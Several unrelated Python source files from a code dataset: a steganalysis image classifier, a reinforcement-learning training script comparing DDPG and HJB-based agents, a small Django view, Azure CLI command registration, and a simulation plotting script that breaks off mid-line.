bit_planes\n\nfrom scipy.stats import pearsonr\n\ndef autocor(A, k, l):\n Xk = A[0:512 - k, 0:512 - l]\n Xl = A[k:512, l:512]\n return pearsonr(Xk.flatten(), Xl.flatten())\n\ndef getHl1(img_hist, l):\n return img_hist[0:256 - l]\n\ndef getHl2(img_hist, l):\n return img_hist[l:256]\n\ndef getCHl(img_hist, l):\n return pearsonr(getHl1(img_hist, l), getHl2(img_hist, l))\n\ndef getModifiedWavelet(C, t):\n for i, row in enumerate(C):\n for j, val in enumerate(row):\n if abs(val) < t:\n C[i][j] = 0\n return C\n\ndef getE(img, t):\n coeffs = pywt.dwt2(img, 'haar')\n LL, (LH, HL, HH) = coeffs\n\n LH = getModifiedWavelet(LH, t)\n HL = getModifiedWavelet(HL, t)\n HH = getModifiedWavelet(HH, t)\n\n img_denoised = pywt.idwt2((LL, (LH, HL, HH)), 'haar')\n\n E = img - img_denoised\n \n return E\n\ndef getCE(img, t, k, l):\n E = getE(img, t)\n return autocor(E, k, l)\n\nimport pywt\n\ndef getFeatures(filename):\n features = []\n \n img = ndimage.imread(filename, mode = 'L')\n bit_planes = getBitPlanes(img)\n\n autocor_kl_pairs = [[1, 0], [2, 0], [3, 0], [4, 0], [0, 1], [0, 2], [0, 3], [0, 4], [1, 1], [2, 2], [3, 3], [4, 4],\n [1, 2], [2, 1]]\n\n M1 = bit_planes[0]\n M2 = bit_planes[1]\n\n features.append(pearsonr(M1.flatten(), M2.flatten())[0])\n\n for pair in autocor_kl_pairs:\n features.append(autocor(M1, pair[0], pair[1])[0])\n\n img_hist, bin_edges = np.histogram(img.flatten(), bins = list(range(0, 257)), density = True)\n\n He = [img_hist[i] for i in range(0, 256, 2)]\n Ho = [img_hist[i] for i in range(1, 256, 2)]\n\n features.append(pearsonr(He, Ho)[0])\n\n for i in range(1, 5):\n features.append(getCHl(img_hist, i)[0])\n \n autocor_tkl_triplets = [[1.5, 0, 1], [1.5, 1, 0], [1.5, 1, 1], [1.5, 0, 2], [1.5, 2, 0], [1.5, 1, 2], [1.5, 2, 1],\n [2, 0, 1], [2, 1, 0], [2, 1, 1], [2, 0, 2], [2, 2, 0], [2, 1, 2], [2, 2, 1], [2.5, 0, 1],\n [2.5, 1, 0], [2.5, 1, 1], [2.5, 0, 2], [2.5, 2, 0], [2.5, 1, 2], [2.5, 2, 1]]\n\n for triplet in autocor_tkl_triplets:\n features.append(getCE(img, triplet[0], triplet[1], triplet[2])[0])\n\n return features\n\n######################################\n# Image Preprocessing code ends here #\n######################################\n\nfrom sklearn.externals import joblib\nfrom os import sys\nfrom pathlib import Path\n\n# Function to return steg label for an image\ndef is_steg(filename):\n # Load persisted models\n base = '/Users/sourish1997/AnacondaProjects/Steganalysis/Final Model/'\n models = [joblib.load(Path(base + 'original_abc.pkl')), joblib.load(Path(base + 'original_mlp.pkl')),\n joblib.load(Path(base + 'good_abc.pkl')), joblib.load(Path(base + 'good_mlp.pkl'))]\n\n # Extract CF feature set for chosen file\n features = [getFeatures(filename)]\n\n preds = []\n\n # Let each model make a prediction\n try:\n for model in models:\n preds.append(model.predict(features))\n except ValueError:\n return -1\n\n cover_count = 0\n steg_count = 0\n for pred in preds:\n if pred[0] == 1:\n steg_count += 1\n else:\n cover_count += 1\n\n # Assign a label based on majority vote\n if cover_count > steg_count:\n return 0\n else:\n return 1\n","sub_path":"Final Model/steganalysisfunc.py","file_name":"steganalysisfunc.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"206619585","text":"import torch\nimport wandb\n\nimport random\nimport numpy as np\n\nfrom training.env import Env\nfrom training.models import Model, DeterministicPolicy, QNetwork\nfrom training.storage import Storage\n\n\ndevice = 'cuda:0' if torch.cuda.is_available() else 'cpu'\n\n\ndef batch_dot(x, y):\n vector_len = x.shape[1]\n return torch.bmm(x.view(-1, 1, vector_len), y.view(-1, vector_len, 1)).view(-1, 1)\n\n\ndef batch_grad(fn, *inputs):\n for inp in inputs:\n inp.requires_grad = True\n out = fn(*inputs)\n out.backward(torch.ones_like(out).to(device))\n\n if len(inputs) == 1:\n return inputs[0].grad\n return [inp.grad for inp in inputs]\n\n\ndef explore(timesteps, env, storage):\n s = env.reset()\n for _ in range(timesteps):\n a = env.random_action()\n s2, c, done = env.step(a)\n storage.store((s, a, c, s2, done))\n s = env.reset() if done else s2\n\n\nclass ddpgAgent:\n def __init__(self, taylor_coef):\n pass\n\n def create_models(self, lr, n_s, n_a, action_space):\n self.policy = Model(DeterministicPolicy, lr, n_s, n_a, action_space, device, target=True)\n self.Q = Model(QNetwork, lr, n_s, n_a, target=True)\n\n def interact(self, s, env, noise):\n a = self.policy(s)\n a = (a + torch.randn_like(a) * noise).clamp(env.action_space.low[0], env.action_space.high[0])\n s2, c, done = env.step(a)\n return s, a, c, s2, done\n\n def update(self, storage, batch_size):\n s, a, c, s2, done = storage.sample(batch_size)\n m = 1 - done\n\n # improve Q function estimator\n s_grad, a_grad = batch_grad(self.Q, s, a)\n with torch.no_grad():\n q_target = c + 0.99 * m * self.Q.target(s2, self.policy.target(s2))\n q_loss = ((q_target - self.Q(s, a)) ** 2).mean()\n self.Q.minimize(q_loss)\n\n # improve policy\n policy_loss = self.Q(s, self.policy(s)).mean()\n self.policy.minimize(policy_loss)\n\n # update target networks\n self.Q.soft_update_target()\n self.policy.soft_update_target()\n\n\nclass regularizationAgent:\n def __init__(self, taylor_coef):\n self.taylor_coef = taylor_coef\n\n def create_models(self, lr, n_s, n_a, action_space):\n self.policy = Model(DeterministicPolicy, lr, n_s, n_a, action_space, device, target=True)\n self.Q = Model(QNetwork, lr, n_s, n_a, target=True)\n\n def interact(self, s, env, noise):\n a = self.policy(s)\n a = (a + torch.randn_like(a) * noise).clamp(env.action_space.low[0], env.action_space.high[0])\n s2, c, done = env.step(a)\n return s, a, c, s2, done\n\n def update(self, storage, batch_size):\n s, a, c, s2, done = storage.sample(batch_size)\n m = 1 - done\n\n # improve Q function estimator\n s_grad, a_grad = batch_grad(self.Q, s, a)\n with torch.no_grad():\n q_target = c + 0.99 * m * self.Q.target(s2, self.policy.target(s2))\n taylor_future = batch_dot(s2-s, s_grad) + batch_dot(self.policy.target(s2)-a, a_grad)\n taylor_target = c + 0.99 * m * taylor_future\n mse = ((q_target - self.Q(s, a)) ** 2).mean()\n taylor_reg = ((taylor_target - self.Q(s,a)) ** 2).mean()\n\n q_loss = mse + (self.taylor_coef * taylor_reg)\n self.Q.minimize(q_loss)\n\n # improve policy\n policy_loss = self.Q(s, self.policy(s)).mean()\n self.policy.minimize(policy_loss)\n\n # update target networks\n self.Q.soft_update_target()\n self.policy.soft_update_target()\n\n\nclass hjbAgent:\n def __init__(self, taylor_coef):\n pass\n\n def create_models(self, lr, n_s, n_a, action_space):\n self.policy = Model(DeterministicPolicy, lr, n_s, n_a, action_space, device, target=True)\n self.Q = Model(QNetwork, lr, n_s, n_a, target=True)\n\n def interact(self, s, env, noise):\n a = self.policy(s)\n a = (a + torch.randn_like(a) * noise).clamp(env.action_space.low[0], env.action_space.high[0])\n s2, c, done = env.step(a)\n return s, a, c, s2, done\n\n def update(self, storage, batch_size):\n s, a, c, s2, done = storage.sample(batch_size)\n m = 1 - done\n\n # improve Q function estimator\n s_grad, a_grad = batch_grad(self.Q.target, s, a)\n with torch.no_grad():\n # future = batch_dot(s2-s, s_grad) + batch_dot(self.policy.target(s2)-self.policy.target(s), a_grad)\n future = batch_dot(s2-s, s_grad) + batch_dot(self.policy.target(s2)-a, a_grad)\n q_target = c + self.Q.target(s,a) + m * 0.99 * future\n q_loss = ((q_target - self.Q(s, a)) ** 2).mean()\n self.Q.minimize(q_loss)\n\n # improve policy\n policy_loss = self.Q(s, self.policy(s)).mean()\n self.policy.minimize(policy_loss)\n\n # update target networks\n self.Q.soft_update_target()\n self.policy.soft_update_target()\n\n\nclass hjbGreedyAgent:\n def __init__(self, taylor_coef):\n pass\n\n def create_models(self, lr, n_s, n_a, action_space):\n self.policy = Model(DeterministicPolicy, lr, n_s, n_a, action_space, device, target=True)\n self.Q = Model(QNetwork, lr, n_s, n_a, target=True)\n\n def interact(self, s, env, noise):\n a = self.policy(s)\n a = (a + torch.randn_like(a) * noise).clamp(env.action_space.low[0], env.action_space.high[0])\n s2, c, done = env.step(a)\n return s, a, c, s2, done\n\n def update(self, storage, batch_size):\n s, a, c, s2, done = storage.sample(batch_size)\n m = 1 - done\n\n # improve Q function estimator\n s_grad, a_grad = batch_grad(self.Q, s, a)\n with torch.no_grad():\n future = batch_dot(s2-s, s_grad) + batch_dot(self.policy.target(s2)-a, a_grad)\n q_target = c + self.Q.target(s,a) + m * 0.99 * future\n q_loss = ((q_target - self.Q(s, a)) ** 2).mean()\n self.Q.minimize(q_loss)\n\n # improve policy\n policy_loss = self.Q(s, self.policy(s)).mean()\n self.policy.minimize(policy_loss)\n\n # update target networks\n self.Q.soft_update_target()\n self.policy.soft_update_target()\n\n\ndef train(algo, env_name, num_timesteps, lr, noise, batch_size, vis_iter, seed=0, log=False, taylor_coef=0.5):\n torch.manual_seed(seed)\n random.seed(seed)\n np.random.seed(seed)\n\n # create env and models\n env = Env(env_name, seed=seed)\n\n # set up algo\n n_s = env.state_dim()\n n_a = env.action_dim()\n algo = algo(taylor_coef)\n algo.create_models(lr, n_s, n_a, env.action_space)\n\n # create storage and add random transitions to it\n storage = Storage(1e6)\n explore(10000, env, storage)\n\n # training loop\n last_ep_cost = 0\n ep_cost = 0\n\n s = env.reset()\n for step in range(int(num_timesteps)):\n # interact with env\n with torch.no_grad():\n s, a, c, s2, done = algo.interact(s, env, noise)\n storage.store((s, a, c, s2, done))\n\n # cost bookkeeping\n ep_cost += c.item()\n\n # algo update\n algo.update(storage, batch_size)\n\n # transition to next state + cost bookkeeping\n if done:\n s = env.reset()\n last_ep_cost = ep_cost\n ep_cost = 0\n else:\n s = s2\n\n # report progress\n if step % vis_iter == vis_iter - 1:\n if log:\n wandb.log({'Average episodic cost': last_ep_cost}, step=step)\n else:\n print(f'Step: {step} | Cost: {last_ep_cost}')\n\n\nif __name__ == '__main__':\n algos = {\n 'ddpg': ddpgAgent,\n 'reg': regularizationAgent,\n 'hjb': hjbAgent,\n 'hjb-greedy': hjbGreedyAgent\n }\n\n defaults = dict(\n algo = 'ddpg',\n env = 'InvertedPendulumPyBulletEnv-v0',\n seed = 3458,\n lr = 3e-4,\n noise = 0.15,\n timesteps = 4e6,\n batch = 128,\n taylor = 0.1,\n vis_iter = 200\n )\n #! CHANGE TIMESTEPS BACK TO 1 MIL\n\n #! REDO THE ANT ENVIRONMENT WITH EXTRA TIMESTEPS\n\n # * for taylor_coef sweeps\n # for seed in defaults['seed']:\n # wandb.init(project=f'Continuity', group=f'{env}', name=f'{seed}-{taylor}', config=defaults, reinit=True)\n # config = wandb.config\n # train(algo=Agent, env_name=config.env, num_timesteps=config.timesteps, lr=config.lr, noise=config.noise, batch_size=config.batch, vis_iter=200, seed=seed, log=True, taylor_coef=config.taylor)\n\n # * for seed sweeps\n wandb.init(project=f'big-papa-HJB', config=defaults)\n config = wandb.config\n train(\n algo=algos[config.algo],\n env_name=config.env,\n num_timesteps=config.timesteps,\n lr=config.lr,\n noise=config.noise,\n batch_size=config.batch,\n vis_iter=config.vis_iter,\n seed=config.seed,\n log=True,\n taylor_coef=config.taylor\n )\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"168421881","text":"from django.shortcuts import render\nfrom .models import ProjectUrl, ProjectUrlItems\nfrom rest_framework.views import APIView\nfrom .serializers import ProjectSerializer, ProjectUrlSerializer\n\n\nclass ProjectUrlApiView(APIView):\n\n def get(self,request,*args,**kwargs):\n return Response(status=200)\n\n def post(self, request,*args,**kwargs):\n print('the data',self.request.data)\n serializer = ProjectUrlSerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n serializer.save()\n print(serializer.data)\n \"\"\" in here we are sending what we submitted in our form data in json \n format response to our javascript with status 201 \"\"\"\n return Response(serializer.data, status=201)\n return Response({}, status=400)\n\n\ndef project_url__create_view(request, *args, **kwargs):\n data = request.data()\n user = 'user'\n name = 'name'\n image = image\n detail = detail\n url = url\n project_url, created = ProjectUrl.objects.get_or_create(\n user=user, name=name)\n project_url_item = ProjectUrlItems.objects.create(user=user,\n image=image,\n detail=detail,\n url=url)\n project_url_qs = ProjectUrl.objects.filter(user=user, name=name)\n if project_url_qs.exists():\n project = project_url_qs[0]\n project_url.project_url_item.add(project_url_item)\n return None\n\n\n","sub_path":"home/portfolio/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"538905013","text":"# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom azure.cli.core.commands import CliCommandType\n\n\ndef load_command_table(self, _):\n\n from azext_healthcareapis.generated._client_factory import cf_service\n healthcareapis_service = CliCommandType(\n operations_tmpl='azext_healthcareapis.vendored_sdks.healthcareapis.operations._service_operations#ServiceOperat'\n 'ions.{}',\n client_factory=cf_service)\n with self.command_group('healthcareapis service', healthcareapis_service, client_factory=cf_service,\n is_experimental=True) as g:\n g.custom_command('list', 'healthcareapis_service_list')\n g.custom_show_command('show', 'healthcareapis_service_show')\n g.custom_command('create', 'healthcareapis_service_create', supports_no_wait=True)\n g.custom_command('update', 'healthcareapis_service_update', supports_no_wait=True)\n g.custom_command('delete', 'healthcareapis_service_delete', supports_no_wait=True)\n\n from azext_healthcareapis.generated._client_factory import cf_operation_result\n healthcareapis_operation_result = CliCommandType(\n operations_tmpl='azext_healthcareapis.vendored_sdks.healthcareapis.operations._operation_result_operations#Oper'\n 'ationResultOperations.{}',\n client_factory=cf_operation_result)\n with self.command_group('healthcareapis operation-result', healthcareapis_operation_result,\n client_factory=cf_operation_result, is_experimental=True) as g:\n g.custom_show_command('show', 'healthcareapis_operation_result_show')\n","sub_path":"src/healthcareapis/azext_healthcareapis/generated/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"491852973","text":"#!/usr/bin/python3\n\"\"\"Module to plot data related to a single\nsimulation.\n\"\"\"\nimport math\nimport logging\nimport os\n\nimport re\nimport shutil\nimport datetime\n\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nfrom matplotlib.backends.backend_pdf import PdfPages\n\nfrom pathlib import Path\n\nfrom parser import get_log_data\nfrom chart_config import init_matplotlib\nfrom navigator import simulation_log_iter\n\nfrom data_analysis import DAException\nfrom data_analysis import clean_data\nfrom data_analysis import get_sim_pdr, get_sim_first_relay_counter, get_sim_slot_estimation, get_sim_failed_slot_estimation\nfrom data_analysis import get_sim_epoch_estimates\nfrom data_analysis import get_sim_sync_counters\nfrom data_analysis import get_sim_trx, get_sim_flood_trx\nfrom data_analysis import get_sim_trx_errors, get_sim_trx_error_details, get_sim_pkt\n\n# -----------------------------------------------------------------------------\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.DEBUG)\nlogging.getLogger(__name__).setLevel(level=logging.DEBUG)\n\n# higher the criticality for matplotlib logs (so to log **less**)\nmpl_logger = logging.getLogger(matplotlib.__name__)\nmpl_logger.setLevel(logging.WARNING)\n# -----------------------------------------------------------------------------\ninit_matplotlib()\n\ndef plot_pdr(nodes_pdr):\n \"\"\"\n Produce a barplot displaying the PDR for each\n node.\n \"\"\"\n x = [int(node_id) for node_id in nodes_pdr.keys()] # node ids\n x.sort()\n x = [str(node_id) for node_id in x]\n y = [nodes_pdr[nid] for nid in x]\n\n mean = sum(y) / len(y)\n std = math.sqrt(sum([(yi - mean)**2 for yi in y]))/len(y)\n if std < 0.000000001:\n std = 0.001\n ylim_max = 1 + std * 0.05\n ylim_min = min(y) - std\n else:\n ylim_max = 1 + std\n ylim_min = min(y) - std\n plt.bar(x, y)\n plt.ylim([ylim_min, ylim_max])\n plt.axhline(y=1, xmin=0, xmax=1, c=\"C2\")\n plt.xlabel(\"Nodes\")\n plt.ylabel(\"PDR\")\n\ndef plot_reception_summary(pkt_tx, nodes_rx):\n str_ = \"Packets broadcast: {}\\n\\n\".format(pkt_tx)\n for nid in sorted([int(i) for i in nodes_rx]):\n str_ += \"Node {}: {}\\n\".format(str(nid).zfill(2),\\\n nodes_rx[str(nid)])\n plt.axes([0.01, 0.01, 0.98, 0.90], facecolor=\"white\", frameon=True)\n axis = plt.gca()\n axis.set_xlim(0., 1.)\n axis.set_ylim(0., 1.)\n axis.set_ylabel(\"Summary\", visible=False)\n axis.set_xlabel(\"Nodes\", visible=False)\n axis.set_xticklabels(\"\", visible=False)\n axis.set_yticklabels(\"\", visible=False)\n axis.grid(False)\n plt.annotate(str_, xy=(0.5, 0.2), ha=\"center\", fontsize=12)\n plt.title(\"Summary:\")\n\ndef plot_first_relay_counter(nodes_frelay):\n \"\"\"Produce a box blot of the values\n assumed by the first relay counter during across\n the considered floods.\"\"\"\n\n x = [int(nid) for nid in nodes_frelay.keys()] # node ids\n x.sort()\n x = [str(nid) for nid in x]\n y = [nodes_frelay[nid] for nid in x] # relay counters\n\n plt.boxplot(y, showfliers=True, whis=[1,99])\n locs, labels = plt.xticks()\n plt.xticks(locs, x)\n plt.xlabel(\"Nodes\")\n plt.ylabel(\"First relay counter\")\n return x,y\n\ndef plot_failed_slot_estimation(nodes_nfailures):\n \"\"\"Produce a boxplot showing how many times a node failed to\n estimate the slot (producing 0 as estimation).\n \"\"\"\n x = [int(nid) for nid in nodes_nfailures.keys()] # node ids\n x.sort()\n x = [str(nid) for nid in x]\n y = [nodes_nfailures[nid] for nid in x]\n\n ind = np.arange(len(y))\n plt.bar(ind, y)\n plt.xticks(ind, x, rotation=90)\n plt.xlabel(\"Nodes\")\n plt.ylabel(\"# Failed estimations\")\n return x,y\n\ndef plot_slot_estimation(nodes_estimates, fliers=False):\n \"\"\"Produce a boxplot showing the values assumed by the\n slot estimation across floods, by each node.\n\n NOTE:\n -----\n Slot values are given with the transceiver precision, where\n 1 unit corresponds to 31ns.\n To note this, the y label of this chart reports\n a \"x31 ns\".\n\n 1 DWT_TU ~= 31ns\n \"\"\"\n x = [int(nid) for nid in nodes_estimates.keys()] # node ids\n x.sort()\n x = [str(nid) for nid in x]\n y = [nodes_estimates[nid] for nid in x]\n\n plt.boxplot(y, showfliers=fliers, autorange=True)\n locs, labels = plt.xticks()\n plt.xticks(locs, x)\n plt.xlabel(\"Nodes\")\n plt.ylabel(r\"Slot estimation ($\\times 31$ ns)\")\n return x,y\n\ndef plot_flood_trx(nodes_tx, nodes_rx):\n \"\"\"Plot number of transmission and reception at each flood,\n showing possible variations in their distributions.\n \"\"\"\n # compute mean value and std of ntx and trx\n mean_tx = {node : np.mean(floods_tx) for node, floods_tx in nodes_tx.items()}\n mean_rx = {node : np.mean(floods_rx) for node, floods_rx in nodes_rx.items()}\n\n std_tx = {node : np.std(floods_tx) for node, floods_tx in nodes_tx.items()}\n std_rx = {node : np.std(floods_rx) for node, floods_rx in nodes_rx.items()}\n\n # gather everything in order\n x = [int(node_id) for node_id in nodes_tx.keys()] # node ids\n x.sort()\n x = [str(node_id) for node_id in x]\n n_tx_mean = [mean_tx[node] for node in x]\n n_tx_std = [std_tx[node] for node in x]\n n_rx_mean = [mean_rx[node] for node in x]\n n_rx_std = [std_rx[node] for node in x]\n\n # Thanks to\n # https://pythonforundergradengineers.com/python-matplotlib-error-bars.html\n width = 0.35\n ind = np.arange(len(x))\n b1 = plt.bar(ind , n_tx_mean, yerr=[n_tx_std, np.repeat(0, len(n_tx_mean))], width=width, align='center', ecolor='black')\n b2 = plt.bar(ind + width, n_rx_mean, yerr=[n_rx_std, np.repeat(0, len(n_rx_mean))], width=width, align='center', ecolor='black')\n plt.xticks(ind + width / 2, x)\n plt.xlabel(\"Nodes\")\n plt.ylabel(\"Avg. Radio Events\")\n plt.legend((b1[0], b2[0]), (\"Tx\", \"Rx\"), loc=\"upper center\")\n\ndef plot_trx(nodes_tx, nodes_rx):\n \"\"\"Show total number of \"service\" packets (NOT application\n packets) transmitted and received from each node.\n \"\"\"\n x = [int(nid) for nid in node_tx.keys()] # node ids\n x.sort()\n x = [str(nid) for nid in x]\n ntx = [nodes_tx[nid] for nid in x]\n nrx = [nodes_rx[nid] for nid in x]\n\n ind = np.arange(len(x))\n width = 0.35\n b1 = plt.bar(ind, nrx, width=width)\n b2 = plt.bar(ind + width, ntx, width=width)\n plt.xticks(ind + width / 2, x)\n plt.xlabel(\"Nodes\")\n plt.ylabel(\"Avg. Radio Events\")\n plt.legend((b1[0], b2[0]), (\"Rx\", \"Tx\"), loc=\"lower left\")\n\ndef plot_trx_errors(nodes_nerrs, nodes_nbad_pkt):\n \"\"\"Plot the number of transmission and reception\n errors, besides the number of bad packet errors.\n\n * # transmission errors is given by\n # RX errors + # TIMEOUTS errors\n\n * # bad packet errors is given by\n # BAD_LEN + # BAD HEADER + # BAD PAYLOAD\n \"\"\"\n x = [int(node_id) for node_id in nodes_nerrs.keys()] # node ids\n x.sort()\n x = [str(node_id) for node_id in x]\n nerr = [nodes_nerrs[nid] for nid in x]\n nbad_pkt = [nodes_nbad_pkt[nid] for nid in x]\n\n ind = np.arange(len(x))\n width = 0.35\n b1 = plt.bar(ind, nerr, width=width)\n b2 = plt.bar(ind + width, nbad_pkt, width=width)\n plt.xticks(ind + width / 2, x, rotation=90)\n plt.xlabel(\"Nodes\")\n plt.ylabel(\"# errors\")\n plt.legend((b1[0], b2[0]), (\"TRx errors\", \"Bad packets\"), loc=\"upper center\")\n\ndef plot_trx_error_details(results):\n # reverse key for sorting\n err_list = [k[::-1] for k in results.keys()]\n err_list.sort()\n # put error names to their correct representation\n err_list = [k[::-1] for k in err_list]\n val_list = [results[k] for k in err_list]\n ind = np.arange(len(err_list))\n plt.bar(ind, val_list, width=0.1)\n plt.xticks(ind, err_list, rotation=25)\n plt.ylabel(\"# errors\")\n\ndef plot_sync_counters(nodes_sync, nodes_desync):\n \"\"\"Plot for each node how many times it was able to synchronize,\n and how many to desync.\"\"\"\n x = [int(node_id) for node_id in nodes_sync.keys()] # node ids\n x.sort()\n x = [str(node_id) for node_id in x]\n y1 = [nodes_sync[node_id] for node_id in x] # nsync\n y2 = [nodes_desync[node_id] for node_id in x] # n_nosync\n\n ind = np.arange(len(x))\n width = 0.35\n b1 = plt.bar(ind, y1, width=width)\n b2 = plt.bar(ind + width, y2, width=width)\n plt.xticks(ind + width / 2, x)\n plt.xlabel(\"Nodes\")\n plt.ylabel(\"# synchronizations\")\n plt.legend((b1[0], b2[0]), (\"Sync\", \"No Sync\"))\n\ndef plot_epoch_estimates(nodes_epochs, fliers=False):\n x = [int(node_id) for node_id in nodes_epochs.keys()] # node ids\n x.sort()\n x = [str(node_id) for node_id in x]\n y = [nodes_epochs[node_id] for node_id in x]\n\n plt.boxplot(y, showfliers=fliers, autorange=True)\n locs, labels = plt.xticks()\n plt.xticks(locs, x, rotation=90)\n plt.xlabel(\"Nodes\")\n plt.ylabel(\"Epoch duration (RTimer units)\")\n\n# -----------------------------------------------------------------------------\n# MAIN-SCRIPT FUNCTIONS\n# -----------------------------------------------------------------------------\ndef get_current_plot_name():\n \"\"\"Return an identifier based on the x,y labels\n of the current plot.\n \"\"\"\n ax = plt.gca()\n xlabel = ax.get_xlabel()\n ylabel = ax.get_ylabel()\n # create a unique filename for the metric, describing the plot\n return str.join(\"_\", re.sub(r\"\\W+\", \" \",\\\n (xlabel + \" \" + ylabel).lower())\\\n .split())\n\ndef plot_simulation_results(sim_name, sim_log_path, format_=None, dest_path=None, overwrite=False):\n \"\"\"Plot simulation results either interactively\n or saving them to files.\n \"\"\"\n if format_ is None:\n format_ = \"\"\n if dest_path is None:\n dest_path = os.path.dirname(os.path.abspath(sim_log_path))\n\n # -------------------------------------------------------------------------\n # check how to display plots\n # -------------------------------------------------------------------------\n pdf_fh = None # multipage pdf file handler\n plot_output = None\n if format_ == \"\":\n\n # use the interactive session\n pic_out = lambda plot_name: plt.show()\n\n if format_.lower() == \"png\":\n\n # create a folder in the destination directory,\n # containing the images generated\n DEST_FOLDER = os.path.join(dest_path, \"figures_{}\".format(sim_name))\n plot_output = DEST_FOLDER\n if os.path.exists(DEST_FOLDER):\n\n if overwrite is True:\n logger.info(\"Destination directory {} already exists. Clashing .png files will be overwritten...\".format(DEST_FOLDER))\n else:\n logger.info(\"Destination directory {} already exists. Skipping computation...\".format(DEST_FOLDER))\n return\n\n else:\n os.mkdir(DEST_FOLDER)\n pic_out = lambda plot_name: plt.savefig(os.path.join(DEST_FOLDER, plot_name + \".png\"), format=\"png\", papertype=\"a4\", dpi=600)\n print(\"Printing figures to: {}\".format(DEST_FOLDER))\n\n elif format_.lower() == \"pdf-multi\":\n\n # create a multipage PDF\n DEST_PDF = os.path.join(dest_path, \"figures_multi_{}.pdf\".format(sim_name))\n plot_output = DEST_PDF\n if os.path.exists(DEST_PDF):\n if overwrite is True:\n logger.info(\"Destination file {} already exists. It will be overwritten...\".format(DEST_PDF))\n else:\n logger.info(\"Destination file {} already exists. Skipping computation...\".format(DEST_PDF))\n return\n\n metadata = {\\\n \"Title\" : \"Results for {}\".format(sim_name),\\\n \"Author\" : \"D3S lab - Unversity of Trento\",\\\n \"Subject\" : None,\\\n \"Keywords\" : \"Glossy PDR epoch hop-count tx rx error\",\\\n \"CreationDate\" : datetime.datetime.today(),\\\n \"ModDate\" : datetime.datetime.today()}\n pdf_fh = PdfPages(DEST_PDF, metadata=metadata)\n pic_out = lambda plot_filename: pdf_fh.savefig(papertype=\"a4\", dpi=600)\n print(\"Printing figures to: {}\".format(DEST_PDF))\n\n elif format_.lower() == \"pdf\":\n\n # create a folder in the destination directory,\n # containing the images generated\n DEST_FOLDER = os.path.join(dest_path, \"figures_{}\".format(sim_name))\n plot_output = DEST_FOLDER\n if os.path.exists(DEST_FOLDER):\n if overwrite is True:\n logger.info(\"Destination directory {} already exists. Clashing .pdf files will be overwritten...\".format(DEST_FOLDER))\n else:\n logger.info(\"Destination directory {} already exists. Skipping compuation...\".format(DEST_FOLDER))\n return\n else:\n os.mkdir(DEST_FOLDER)\n pic_out = lambda plot_name: plt.savefig(os.path.join(DEST_FOLDER, plot_name + \".pdf\"), format=\"pdf\", papertype=\"a4\", dpi=600)\n print(\"Printing figures to: {}\".format(DEST_FOLDER))\n\n # -------------------------------------------------------------------------\n\n try:\n print(\"-\"*40 + \"\\nProcessing file:\\n%s\\n\" % sim_log_path + \"-\"*40)\n log_data = get_log_data(sim_log_path)\n clean_data(log_data, 20)\n\n # -------------------------------------------------------------------------\n # PLOTTING DATA\n # -------------------------------------------------------------------------\n\n try:\n pkt_tx, nodes_rx, not_received = get_sim_pkt(log_data)\n\n # display info on the effective # packets\n # received by each node\n print(\"Number of packets considered: {}\".format(pkt_tx))\n print(\"-\" * 40)\n for nid, nrx in nodes_rx.items():\n print(\"Node {}: {}\".format(str(nid).zfill(2), nrx))\n\n not_received = {k:v for k,v in not_received.items() if len(v) > 0}\n if len(not_received) > 0:\n print(\"-\"*40 + \"\\nNOT RECEIVED\\n\" + \"-\"*40)\n for nid, nr in not_received.items():\n pkts = [str(seqno) for seqno in list(nr)]\n missing_pkts = str.join(\", \", pkts)\n print(\"Id %s: %s\" % (str(nid).zfill(2), missing_pkts))\n else:\n print(\"Every packet has been received\")\n\n plt.figure()\n plt.tight_layout()\n plot_reception_summary(pkt_tx, nodes_rx)\n pic_out(\"summary\")\n plt.close()\n\n plt.figure()\n nodes_pdr = get_sim_pdr(log_data)\n plot_pdr(nodes_pdr)\n plt.tight_layout()\n plot_name = get_current_plot_name()\n pic_out(plot_name)\n plt.close()\n except DAException as e:\n raise e\n except Exception as e:\n logger.debug(\"Couldn't plot pdr\")\n\n try:\n plt.figure()\n nodes_frelay = get_sim_first_relay_counter(log_data)\n plot_first_relay_counter(nodes_frelay)\n plt.tight_layout()\n plot_name = get_current_plot_name()\n pic_out(plot_name)\n plt.close()\n except DAException as e:\n raise e\n except Exception as e:\n logger.debug(\"Couldn't plot relay counter\")\n\n try:\n nodes_estimates = get_sim_slot_estimation(log_data)\n nodes_nfailures = get_sim_failed_slot_estimation(log_data)\n plt.figure()\n plt.subplot(1,2,1)\n plot_slot_estimation(nodes_estimates, FLIERS)\n plt.subplot(1,2,2)\n plot_failed_slot_estimation(nodes_nfailures)\n plt.tight_layout()\n plot_name = get_current_plot_name()\n pic_out(plot_name)\n plt.close()\n except DAException as e:\n raise e\n except Exception as e:\n logger.debug(\"Couldn't plot slot estimation\")\n\n try:\n nodes_estimates = get_sim_epoch_estimates(log_data)\n plot_epoch_estimates(nodes_estimates, FLIERS)\n plot_name = get_current_plot_name()\n pic_out(plot_name)\n plt.close()\n except DAException as e:\n raise e\n except Exception as e:\n logger.debug(\"Couldn't plot epoch estimations\")\n\n try:\n plt.figure()\n nodes_sync, nodes_desync = get_sim_sync_counters(log_data)\n plot_sync_counters(nodes_sync, nodes_desync)\n plt.tight_layout()\n plot_name = get_current_plot_name()\n pic_out(plot_name)\n plt.close()\n except DAException as e:\n raise e\n except Exception as e:\n logger.debug(\"Couldn't plot sync counters\")\n\n try:\n plt.figure()\n #plot_trx(log_data)\n nodes_tx, 